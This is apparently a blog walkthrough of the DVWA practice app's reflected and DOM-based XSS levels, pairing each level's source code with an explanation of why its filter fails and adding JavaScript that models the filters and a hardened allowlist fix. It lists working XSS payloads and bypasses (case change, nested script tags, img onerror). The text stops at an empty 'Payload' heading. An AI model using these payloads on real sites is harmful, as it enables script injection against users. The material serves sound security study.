Everyone knows the DVWA practice range. I have been studying XSS recently, so I went through the XSS section again, this time looking at the causes of each XSS from the source code. I referred to many other bloggers' posts, and thank them for that. There are plenty of DVWA walkthroughs online already, so this is just a quick write-up.
For more web security content, visit: https://lmg66.github.io/ --------> anti-scraper
Environment setup
Official site:
Download: https://github.com/ethicalhack3r/DVWA
Download method: zip download or git, https://github.com/ethicalhack3r/DVWA
Once downloaded, place it under an HTTP server's web root.
I use phpstudy; download: https://m.xp.cn/
Reflected XSS
Level: Low
View source:
```php
<?php
// Disable the browser's (legacy) XSS auditor so the reflected payload is not blocked client-side
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user ($html is the page buffer assembled by index.php)
    $html .= '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}
?>
```
Analysis
The name parameter is neither filtered nor encoded; it is concatenated straight into the <pre> tag, so whatever HTML it contains is rendered and whatever script it contains runs. The X-XSS-Protection: 0 header also switches off the browser-side XSS filter that older browsers had, so nothing stands between the payload and the page.
Payload
/vulnerabilities/xss_r/?name=<script>alert('xss')<%2Fscript>#
![DVWA(xss部分源码分析)](http://www.likecs.com/default/index/img?u=aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMjA5MjY3MS8yMDIwMDcvMjA5MjY3MS0yMDIwMDcxNTE3NDI1MDAyNS03NzA0MDM5Ni5wbmc=)
Level: Medium
View source:
```php
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input: delete the literal string "<script>" (case-sensitive, single pass)
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );
    // Feedback for end user
    $html .= "<pre>Hello ${name}</pre>";
}
?>
```
Analysis
The filter here is not a regular expression but str_replace(), which deletes the literal string <script> from the input. It is case-sensitive, it matches only that exact tag, and it runs a single pass instead of looping until nothing changes. That gives three bypasses, one per payload below: change the case (<Script> is not <script>), use a tag that does not need the word script at all (img with an onerror handler), or nest the string so that removing <script> once leaves <script> behind (<s<script>cript>).
Payload
vulnerabilities/xss_r/?name=<Script>alert('xss')<%2FScript>#
vulnerabilities/xss_r/?name=<img+src%3Dx+onerror%3Dalert('XSS')>#
/vulnerabilities/xss_r/?name=<s<script>cript>alert('XSS')<%2Fscript>#
![DVWA(xss部分源码分析)](http://www.likecs.com/default/index/img?u=aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMjA5MjY3MS8yMDIwMDcvMjA5MjY3MS0yMDIwMDcxNTE3NDUxNTg4NS03NDc0NTg4NzcucG5n)
![DVWA(xss部分源码分析)](http://www.likecs.com/default/index/img?u=aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMjA5MjY3MS8yMDIwMDcvMjA5MjY3MS0yMDIwMDcxNTE3NDUyMjEzNi0xNzQ1MjI5ODcxLnBuZw==)
![DVWA(xss部分源码分析)](http://www.likecs.com/default/index/img?u=aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMjA5MjY3MS8yMDIwMDcvMjA5MjY3MS0yMDIwMDcxNTE3NDUyOTU0MS00OTEwMzg2MjgucG5n)
Level: High
View source:
```php
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input: strip anything from "<" through the letters s,c,r,i,p,t in order, case-insensitively
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
    // Feedback for end user
    $html .= "<pre>Hello ${name}</pre>";
}
?>
```
Analysis
The pattern is case-insensitive and the (.*) groups act as wildcards, so changing case or inserting characters between the letters of script no longer helps, and nesting fails too: everything from a < through the letters s, c, r, i, p, t in that order is removed. But the regex only ever targets the word script, so a different tag that carries its own event handler, such as img with onerror, passes through untouched and still triggers the popup.
Payload
/vulnerabilities/xss_r/?name=<img+src%3D"xss"+onerror%3Dalert('xss')>#
Level: Impossible
View source:
```php
<?php
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
    // Get input: encode & < > " (and ' on PHP >= 8.1) as HTML entities
    $name = htmlspecialchars( $_GET[ 'name' ] );
    // Feedback for end user
    $html .= "<pre>Hello ${name}</pre>";
}
// Generate Anti-CSRF token
generateSessionToken();
?>
```
Analysis
The name parameter goes through htmlspecialchars(), which converts the predefined characters &, <, > and " into HTML entities, and the result is placed inside the text content of the <pre> tag rather than in an attribute or script context. An encoded < or > is displayed, not parsed, so for now there is nothing to break out with here. Two details worth knowing: on PHP versions before 8.1 the default flags do not encode the single quote (ENT_QUOTES only became the default in 8.1), which is harmless inside element text like this but would matter inside a single-quoted attribute; and checkToken() ties the request to the session's anti-CSRF token, so the page cannot even be reached with a bare crafted link.
![DVWA(xss部分源码分析)](http://www.likecs.com/default/index/img?u=aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMjA5MjY3MS8yMDIwMDcvMjA5MjY3MS0yMDIwMDcxNTE3NDgyNDIxNi00NDU0MzEwNjIucG5n)
![DVWA(xss部分源码分析)](http://www.likecs.com/default/index/img?u=aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMjA5MjY3MS8yMDIwMDcvMjA5MjY3MS0yMDIwMDcxNTE3NDgzMDY5OC03ODU3MDQ4NTAucG5n)
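To see all four reflected-XSS filters side by side, here is an added example (not DVWA's own code) that re-implements the Low, Medium, High and Impossible filters from the PHP above in JavaScript and runs this page's payloads through each of them. The stillExecutes() check is a deliberately crude pattern match, not an HTML parser; the quoteSingle flag models the pre-8.1 versus 8.1+ default of htmlspecialchars(), and the payload list is taken from the page with the URL encoding removed.

```javascript
// Added example, not DVWA's own code: the four server-side filters from
// vulnerabilities/xss_r/source/{low,medium,high,impossible}.php re-implemented
// in JavaScript so the page's payloads can be run through them offline.

// Low: the name is echoed untouched.
function filterLow(name) {
  return name;
}

// Medium: str_replace('<script>', '', $name) removes every literal,
// case-sensitive occurrence in one pass; it does not loop until stable.
function filterMedium(name) {
  return name.split("<script>").join("");
}

// High: preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name).
// Same pattern in JS: greedy .* between the letters, case-insensitive,
// global so that every match is removed as preg_replace does.
function filterHigh(name) {
  return name.replace(/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/gi, "");
}

// Impossible: htmlspecialchars($name). & < > " are always encoded; the single
// quote is encoded only with ENT_QUOTES, which is the default from PHP 8.1 on.
// quoteSingle = true models PHP >= 8.1, false models the older default.
function filterImpossible(name, quoteSingle = true) {
  let out = name
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
  if (quoteSingle) out = out.replace(/'/g, "&#039;");
  return out;
}

const FILTERS = { low: filterLow, medium: filterMedium, high: filterHigh, impossible: filterImpossible };

// What each level writes to the page: $html .= "<pre>Hello ${name}</pre>".
function renderGreeting(level, name) {
  return "<pre>Hello " + FILTERS[level](name) + "</pre>";
}

// Crude check, not an HTML parser: does a <script> tag or a tag with an
// on* event-handler attribute survive in the rendered markup?
function stillExecutes(html) {
  return /<script\b/i.test(html) || /<[a-z][^>]*\son\w+\s*=/i.test(html);
}

// The payloads used on this page (URL-decoded), in the order they appear.
const PAYLOADS = [
  "<script>alert('xss')</script>",          // Low
  "<Script>alert('xss')</Script>",          // Medium: case change
  "<s<script>cript>alert('XSS')</script>",  // Medium: nesting beats a single pass
  "<img src=x onerror=alert('XSS')>",       // Medium/High: no "script" at all
];

// Returns, per level, which payloads still execute after that level's filter.
function runPayloads() {
  const result = {};
  for (const level of Object.keys(FILTERS)) {
    result[level] = PAYLOADS.map((p) => stillExecutes(renderGreeting(level, p)));
  }
  return result;
}

console.log(runPayloads());
```

Running it shows the progression the four levels are meant to teach: Low lets everything through, Medium stops only the lower-case <script> payload, High stops every payload that contains the letters of script but not the img/onerror one, and Impossible neutralises all four because the rendered output no longer contains a raw < at all.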
DOM-based XSS
Level: Low
View source:
```html
<div>
<p>Please choose a language:</p>
<form method="GET">
<select>
<script>
// Everything after "default=" in the full URL (fragment included) is written
// into the page unencoded, as both the option's value and its text
if (document.location.href.indexOf("default=") >= 0) {
    var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);
    document.write("<option value='" + lang + "'>" + decodeURI(lang) + "</option>");
    document.write("<option value='' disabled='disabled'>----</option>");
}
document.write("<option value='English'>English</option>");
document.write("<option value='French'>French</option>");
document.write("<option value='Spanish'>Spanish</option>");
document.write("<option value='German'>German</option>");
</script>
</select>
<input type="submit" value="Select" />
</form>
</div>
```
Analysis
The script reads the whole URL from document.location.href, takes everything after default= with no filtering or encoding, and writes it into the page with document.write(), both as the option's value attribute and as its text. The sink is entirely client-side: because the value comes from href, a payload placed after a # is never sent to the server, so it does not appear in server logs and no server-side filter can see it. decodeURI() is there only because browsers percent-encode some characters in href; it does not sanitise anything.
![DVWA(xss部分源码分析)](http://www.likecs.com/default/index/img?u=aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMjA5MjY3MS8yMDIwMDcvMjA5MjY3MS0yMDIwMDcxNTE3NTAxMzQyOS0zNTEwODQ3NjMucG5n)
![DVWA(xss部分源码分析)](http://www.likecs.com/default/index/img?u=aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMjA5MjY3MS8yMDIwMDcvMjA5MjY3MS0yMDIwMDcxNTE3NTAyMTM4Ny0xODI3NDEwMTkucG5n)
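As an added example (not part of the original post or of DVWA), the vulnerable default= handling above is modelled as plain string functions so it runs under Node without a browser (document.write is replaced by returning the markup it would have written), beside a hardened version that parses the query with URLSearchParams, accepts only the four known languages, and encodes on output. The sample URLs, including the 127.0.0.1/DVWA host and path, are constructed for this example.

```javascript
// Added example, not DVWA's own code: the vulnerable `default=` handling from
// the DOM XSS page as pure string functions, plus a hardened equivalent.

// Mirrors the page's logic: everything after the first "default=" in the
// full href, fragment included, becomes the option value and text.
function extractLangVulnerable(href) {
  const i = href.indexOf("default=");
  if (i < 0) return null;
  return href.substring(i + "default=".length);
}

function buildOptionVulnerable(href) {
  const lang = extractLangVulnerable(href);
  if (lang === null) return "";
  // decodeURI() turns %3C/%3E back into < and > (it leaves reserved
  // characters such as %2F alone) and throws URIError on a malformed escape.
  return "<option value='" + lang + "'>" + decodeURI(lang) + "</option>";
}

// Hardened version (assumed design, not from the page): parse the query
// properly, accept only the four known languages, and encode when rendering.
const ALLOWED_LANGS = ["English", "French", "Spanish", "German"];

function extractLangSafe(href) {
  const lang = new URL(href).searchParams.get("default");
  return ALLOWED_LANGS.includes(lang) ? lang : "English";
}

function escapeHtml(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}

function buildOptionSafe(href) {
  const lang = escapeHtml(extractLangSafe(href));
  return '<option value="' + lang + '">' + lang + "</option>";
}

// Constructed sample URLs; the host and path are assumptions.
const BASE = "http://127.0.0.1/DVWA/vulnerabilities/xss_d/";
const SAMPLES = {
  normal: BASE + "?default=English",
  script: BASE + "?default=<script>alert(1)</script>",
  breakout: BASE + "?default=English</option></select><img src=x onerror=alert(1)>",
  fragment: BASE + "?default=English#<img src=x onerror=alert(1)>",   // never reaches the server
  encoded: BASE + "?default=%3Cscript%3Ealert(1)%3C/script%3E",       // undone by decodeURI()
};

// Vulnerable vs. hardened output for every sample URL.
function compare() {
  const out = {};
  for (const [name, href] of Object.entries(SAMPLES)) {
    out[name] = { vulnerable: buildOptionVulnerable(href), safe: buildOptionSafe(href) };
  }
  return out;
}

console.log(JSON.stringify(compare(), null, 2));
```

The fragment sample is the one to remember: the vulnerable extractor happily returns English#<img src=x onerror=alert(1)> because it slices the raw href, while the hardened version never sees the fragment at all and falls back to the allowlist default. An allowlist on the value is what actually closes the hole; escapeHtml() on output is defence in depth for the day someone widens the list.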
Payload